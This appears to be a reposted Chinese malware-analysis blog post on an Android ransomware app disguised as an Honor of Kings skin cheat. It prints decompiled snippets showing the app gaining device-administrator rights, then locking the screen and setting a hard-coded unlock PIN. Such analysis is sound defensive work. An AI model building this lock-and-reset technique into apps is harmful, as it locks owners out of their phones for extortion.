2. 程式人生 > >Android病毒樣本分析(3)

Android病毒樣本分析(3)

阿新 發佈:2019-01-28

1.基本資訊

病毒名稱: com.android.getbest-1

檔名稱: 王者榮耀刷面板

檔案MD5: 4FF98D2A5F045921757B73FAA1D6012D

檔案包名: com.android.getbest

危害屬性: 惡意鎖屏、勒索

2.基本行為

該程式是一款假借王者榮耀外掛名號的病毒軟體,程式啟動後隱藏自身圖示,誘騙使用者啟用裝置管理器保護自身以免被解除安裝,之後實現鎖屏操作,並且關機無效



3.詳細分析

1、程式入口函式內啟動了一個活動

try
    {
      Class localClass = Class.forName("com.android.getbest.MyAdmin");
      this.componentName = new ComponentName(this, localClass);
      this.isAdminActive = this.dpm.isAdminActive(this.componentName);
      return;
    }
2、活動內,利用裝置管理器設定解鎖PIN碼,通過誘導使用者啟用裝置管理器,勒索軟體會在使用者未知情的情況下強制給手機設定一個解鎖PIN碼,導致使用者無法解鎖手機。 
setContentView(2130903040);
    ((Button)findViewById(2131165185)).setText((CharSequence)jiemi.decrypt("A83B614B5AD4F25664AE7C3E62837B8B", "huawei"));
    this.dpm = ((DevicePolicyManager)getSystemService("device_policy"));      //獲取許可權
    checkAdmin();                                                             //修改解鎖PIN碼
    paramBundle = new Intent();  
 
@Override
  public void onEnabled(Context paramContext, Intent paramIntent)
  {
    String str = paramContext.getSharedPreferences("test", 0).getString("test", String.valueOf(6699));   //解鎖碼
    getManager(paramContext).lockNow();
    getManager(paramContext).resetPassword(str, 0);
    super.onEnabled(paramContext, paramIntent);
  }




相關推薦

Android病毒樣本分析(3)

1.基本資訊 病毒名稱: com.android.getbest-1 檔名稱: 王者榮耀刷面板 檔案MD5: 4FF98D2A5F045921757B73FAA1D6012D 檔案包名: com.android.getbest 危害屬性: 惡意鎖屏、勒索 2.基本行為

Android版本的 Wannacry 檔案加密病毒樣本分析 附帶鎖機

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

如何在現有復雜網絡上建立隔離網提供病毒樣本分析,且不蔓延內網。

alt HP 防火墻 硬盤 區域 VR PC 思想 term 目前安全廠家及安全公司都有病毒樣本分析及惡意程序分析的研究的必要性,大家都采用的大同小異的方式。 各位安全研究員先生無關乎用了以下幾種方式,我講的幾種方式中還有幾種至少博主所在的公司人不了解還沒有在用,言歸正傳,

病毒樣本分析小結

最近在學習病毒樣本分析,有一些初級的感悟,希望和大家多多交流。 我是使用IDA進行反彙編分析病毒樣本的,其實本人認為病毒解析在很大程度上是非理性的元素佔得多一些,一個程式,若果從main函式開始一點一點的進行分析,少說也要一個禮拜才能夠完成,而時間上付出的代價太大了,病毒

2019年4月最新勒索病毒樣本分析及數據恢復

cal RoCE gmail proc type 安裝 text file gic 1. satan病毒升級變種satan_pro特征:.satan_pro 後綴勒索郵箱:[email protected] [email protected] 等 2、

2019年5月最新勒索病毒樣本分析及數據恢復

str crypt mage imp elm 其他 img adobe 圖片 一、依然熟悉的“老面孔” 1、GANDCRAB病毒病毒版本:GANDCRAB V5.2中毒特征:<原文件名>.隨機字符串勒索信息:隨機字符串-DECRYPT.txt?隨機字符串-MA

Android 7.0 Gallery圖庫源碼分析3 - 數據加載及顯示流程

不為 isempty stat submit mode 準備工作 RKE xtu ida 前面分析Gallery啟動流程時,說了傳給DataManager的data的key是AlbumSetPage.KEY_MEDIA_PATH,value值,是”/combo/{/loca

[Android病毒分析]鎖屏病毒之免流伺服器

鎖屏病毒之免流伺服器 一、 樣本概況 1.1 樣本資訊 檔名稱:免流伺服器.apk 檔案型別:application/jar 樣本包名:zs.ip.proxy 樣本大小:782KB MD5:2EFCA46F34A565C2EF4052B89B6B364B SHA1:5493A95

[Android病毒分析]鎖屏病毒之百變氣泡

鎖屏病毒之百變氣泡 一、樣本概況 1.1 樣本分析 檔名稱:百變氣泡 檔案型別:application/jar 樣本包名:Aaron.tencent.kou 樣本大小:287KB MD5:e7c653a4195cd36f27933b4ef1fe8328 SHA1:126B25E8

[Android病毒分析]木馬病毒之DroidKongFu病毒

木馬病毒之DroidKongFu病毒 一、 樣本概況 1.1 樣本資訊 檔名稱:Cut The Rope Unlock.apk 檔案型別:application/jar 樣本包名:com.tebs3.cuttherope 樣本大小:88.1KB MD5:45F86E5027495

[Android病毒分析]木馬病毒之10086

木馬病毒之10086 一、 樣本概況 1.1 樣本資訊 檔名稱:10086.apk 檔案型別:application/jar 樣本包名:iuxkikw.zkjaksj.jhyvu 樣本大小:31.3KB MD5:C2CD6ABCB62A8DF958049ACFFA204392 S

Android 外掛化分析3)- Activity啟動流程

在真正分析外掛化技術前,我們必須瞭解一些必要的關於Android四大元件的相關知識。 以Activity為例,我們需要了解Activity啟動過程,才能有效的進行Hook實現外掛化。 以Android 8.1為例 我們啟動一個Activity通常會使用startActi

Python 進行病毒樣本特徵分析

這幾天一直在做有關病毒樣本特徵提取的工作,解析出了一個樣本病毒特徵,今天用python進行了相似樣本的檢驗,想和大家一同分享。 開始是這麼寫的:  #!/usr/bin/python  import os  import os.path  rootdir = "./samp

Android EventBus原始碼分析,基於最新3.1.1版本,看這一篇就夠了!!

Android EventBus原始碼分析,基於最新3.1.1版本,看這一篇就夠了!! 前言 上一篇文章對EventBus進行了一個介紹,並且對它的使用方式作了一個較全面的分析,建議在閱讀本文之前,先看看上篇文章的內容:EventBus使用(全面分析,細節提醒) 本篇文章主要

Android之 MTP框架和流程分析 (3)

前面轉發了篇部落格介紹了MTP, 偏重於上層,已經很清楚了。這篇側重於底層,按照一定的流程講。 1. 程式碼位置 packages/providers/MediaProvider/src/com/android/providers/media/MtpReceiver.j

Android事件分發(3)--ViewGroup原始碼分析

一、ViewGroup的onInterceptTouchEvent原始碼分析 onInterceptTouchEvent比較簡單先看他的原始碼 public boolean onInterceptTouchEvent(MotionEvent ev

android-進階(3)-自定義view(2)-Android中View繪製流程以及相關方法的分析

最近正在學自定義view,這篇文章主要講view的繪製流程和一些相關的方法,淺顯易懂,寫的非常好,忍不住就轉載了。             前言: 本文是我讀《Android核心剖析》第13章----View工作原理總結而成的,在此膜拜下作者 。

Android 5.0 Camera系統原始碼分析(3):Camera預覽流程控制流

1. 前言 本文分析的是Android系統原始碼,從frameworks層到hal層,記錄了Camera進入預覽模式的重點程式碼,主要為控制流程的程式碼,有關影象buffer的傳遞暫不涉及,硬體平臺基於mt6735。由於某些函式比較複雜,在貼出程式碼時會適當對

Android基礎新手教程——3.8 Gestures(手勢)

too 內部 arr dial 無法找到 intent 圖片 don item Android基礎新手教程——3.8 Gesture(手勢)

Android進階】(3)Android圖像處理

progress chang etc geo xtend static ogr arch 取出 1. 概念 色調/色相:物體傳遞的顏色 飽和度:顏色的純度,從0(灰)到100%(飽和)來進行描寫敘述 亮度/明度:顏色的相對明暗程度 2. 調整圖像小Demo 創建一個